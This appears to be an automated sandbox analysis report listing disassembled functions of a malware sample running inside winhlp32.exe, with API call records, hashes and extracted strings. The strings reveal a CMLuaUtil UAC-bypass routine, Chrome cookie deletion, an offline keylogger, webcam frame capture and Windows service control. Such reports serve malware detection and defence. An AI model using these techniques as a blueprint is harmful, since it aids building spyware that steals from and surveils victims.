                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\winhlp32.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\winhlp32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-1839853256
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • UserProfile, xrefs: 0040BAAD
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 0043AC69
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                    • __allrem.LIBCMT ref: 0043AC9C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                    • __allrem.LIBCMT ref: 0043ACD1
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                    • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                    • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                    • wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                    • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                    • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
